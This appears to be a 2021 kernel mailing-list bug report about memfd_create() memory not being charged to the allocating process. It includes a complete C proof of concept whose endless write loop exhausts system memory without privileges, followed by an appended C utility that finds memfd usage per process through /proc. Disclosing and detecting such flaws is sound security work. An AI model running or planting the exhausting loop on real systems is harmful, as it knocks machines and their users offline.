Possible deny of service with memfd_create()

From: Christian König
Date: Thu Feb 04 2021 - 11:34:02 EST


Hi Michal,

as requested in the other mail thread, the following sample code gets my test system down within seconds.

The issue is that the memory allocated for the file descriptor is not accounted to the process allocating it, so the OOM killer picks whatever process it thinks is good but never my small test program.

Since memfd_create() doesn't need any special permission, this is a rather nice denial of service and, as far as I can see, also works with a standard Ubuntu 5.4.0-65-generic kernel.

Cheers,
Christian.

#define _GNU_SOURCE
#include <sys/mman.h>
#include <unistd.h>
#include <stdlib.h>

unsigned char page[4096];

int main(void)
{
        int i, fd;

        for (i = 0; i < 4096; ++i)
                page[i] = i;

        fd = memfd_create("test", 0);

        while (1)
                write(fd, page, 4096);
}
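
Added example, not part of the original mail: because the memory sits behind the file descriptor rather than in the process's own accounting, an administrator hunting for the culprit can sum the allocated size of the memfd files each process holds open via /proc/<pid>/fd. The function names below are hypothetical, and reading another user's fd directory is assumed to require the same uid or root.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* memfd files show up in /proc/<pid>/fd as links to "/memfd:<name> (deleted)". */
int is_memfd_link(const char *target)
{
        return strncmp(target, "/memfd:", 7) == 0;
}

/* Bytes allocated to memfd files held open by pid; -1 if the fd directory
 * cannot be read. proc_root is normally "/proc". */
long long memfd_bytes_for_pid(const char *proc_root, pid_t pid)
{
        char dir[256], path[1024], target[1024];
        long long total = 0;
        struct dirent *de;
        struct stat st;
        ssize_t n;
        DIR *d;

        if (snprintf(dir, sizeof(dir), "%s/%ld/fd", proc_root, (long)pid) >= (int)sizeof(dir))
                return -1;
        d = opendir(dir);
        if (!d)
                return -1;
        while ((de = readdir(d)) != NULL) {
                snprintf(path, sizeof(path), "%s/%s", dir, de->d_name);
                n = readlink(path, target, sizeof(target) - 1);
                if (n < 0)      /* "." and ".." are not links and land here */
                        continue;
                target[n] = '\0';
                /* stat() follows the link to the memfd inode; st_blocks is in 512-byte units. */
                if (is_memfd_link(target) && stat(path, &st) == 0)
                        total += (long long)st.st_blocks * 512;
        }
        closedir(d);
        return total;
}

int main(int argc, char **argv)
{
        pid_t pid = argc > 1 ? (pid_t)atol(argv[1]) : getpid();
        printf("%ld: %lld bytes in memfd files\n", (long)pid, memfd_bytes_for_pid("/proc", pid));
        return 0;
}
```

Run it with a PID as the only argument; looping over every numeric entry in /proc and sorting by the result points at the process whose descriptors are pinning the memory.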